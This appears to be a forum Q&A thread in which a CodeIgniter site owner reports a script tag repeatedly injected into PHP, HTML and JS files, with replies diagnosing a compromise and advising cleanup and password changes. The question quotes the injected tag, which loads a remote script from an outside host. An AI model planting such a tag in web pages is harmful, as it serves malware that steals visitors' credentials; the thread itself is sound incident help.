# another url link on my website

Tags: php, codeigniter

I have a problem with my website. I don't why the index.php was being inserted with the script below. This index.php is part of codeigniter, the framework that I was currently used. Is this inserted thru accessing ftp or thru code. After I was deleted this script I noticed that on the lower left of my browser there is another url being read. I don't know how to trace this because I tried to find this url but I couldn't see it. Please help me

I encountered this scenario twice.

Any suggestion would greatly appreciated.

```
 <script type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></script>
 <!--11428cb2b3b67368730c012cb53eb247-->
```

Comment: What do you mean the index.pp is being inserted? like src="http://index.php/drunkjeans.com:8080/Cc.js?

Comment: Your question is not clear. You are using CI. IIRC, CI uses an index.php file much like other frameworks. Do you know how CI works? Are you developing or did you inherit the project?

Do you want to know how that script tag is being inserted?

Comment: If you haven't changed CI's options, it should be by default that index.php show up on urls.

Answer (score 1):

Your site has probably been compromised by an attacker. This sort of thing can happen if you have any folders that are world-writable (check your folder permissions). Also check for new files that weren't there before (they could be named anything and could be in any folder within the site's root folder).

For some more info on similar attacks, see:

http://forums.techguy.org/virus-other-malware-removal/871970-strange-b1-html-tag-embedding.html

and

http://www.phpfreaks.com/forums/index.php/topic,274404.msg1297647.html#msg1297647

Comment: hi thanks for your reply

I mean at the end of my php, html and js that script has been inserted. I tried to replace all the file but after an hour it was attacked again. I'll checked file attributes of my folder in ftp and only owner permission has been check. I tried to look at the forums link you provided but I couldn't find any clear solution.

thanks a lot

Comment: Changing the affected files won't fix anything. You need to eradicate the script(s) that were uploaded into the site's folder (there could be one or many).

Honestly, the best way to handle it is probably to start with installation of Code Ignitor and then manually bring in any changes/additions you made to the codebase. Otherwise you might miss one of the malicious scripts and be back to square one.

Answer (score 0):

Hey guys I got some info here: http://www.everythingilike.com/roundstorm-ftp-hack-solution

Basically the js hack inserts a java app which executes. This java app scans your FTP info and even any Shell/SSH login information. I suggest changing all your passwords after the clean up.

Comment: The hack consists of both Javascript and Java. Initially the Javascript is executed via the browser which embeds the Java applet into the web page. The Java applet contains the main nuts/bolts which scans the users pc for passwords and installs itself onto the system.